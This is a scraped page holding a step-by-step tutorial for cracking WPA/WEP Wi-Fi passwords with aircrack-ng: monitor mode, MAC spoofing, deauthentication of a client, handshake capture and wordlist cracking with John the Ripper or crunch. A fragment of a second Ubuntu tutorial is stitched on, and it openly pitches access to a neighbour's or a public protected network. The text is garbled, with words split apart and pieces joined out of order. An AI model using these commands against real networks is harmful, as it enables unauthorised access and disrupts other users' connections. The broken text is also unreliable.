You are on page 1of 2

Step 1 : airmon-ng The result will be something like : Interface wlan0 Step 2 : airmon-ng start wlan0 Step 3 (Optional)

: Change the mac address of the mon0 interface. ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up Step 4 : airodump-ng mon0 Then, press "Ctrl+c" to break the program. Step 5 : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0 *where -c is the channel -w is the file to be written --bssid is the BSSID This terminal is keeping running. Step 6 : open another terminal. aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0 *where -a is the BSSID -c is the client MAC address (STATION) Wait for the handshake. Step 7 : Use the John the Ripper as word list to crack the WPA/WP2 password. aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,, If you do not want to use John the Ripper as word list, you can use Crunch. Go to the official site of crunch. Chipset Intel 5100 Driver iwlagn - [phy0]

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/ Download crunch 3.0 (the current version at the time of this writing). http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0 .tgz/download tar -xvzf crunch-3.0.tgz cd crunch-3.0 make make install /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst m ixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w *where 8 16 is the length of the password, i.e. from 8 characters to 16 characte rs.

using ubuntu If you are in a public place and you cannot connect to a wireless networked bec ause it's protected... If your neighbors have a Wi-Fi protected connection and y ou want to share it with them... If you have lost your Wi-Fi key and you want to recover it back... Here is a tutorial that will show you How to Crack Wireless Protected Access that uses WEP as Encryption using Ubuntu and without the need t o use Backtrack. Step 1 ( Installing Aircrack-ng ) Open new terminal and type : sudo apt-get install aircrack-ng and let it install the new commands of aircrack-ng.

Step 2 ( Listing and monitoring your Wi-Fi device) Open a new terminal and type : sudo airmon-ng It will lists your network devices like this Read more: How to Hack Wi-Fi Password using Ubuntu [Pro.] | Nawayugaya - Downloa ds Zone Under Creative Commons License: Attribution Share Alike

You might also like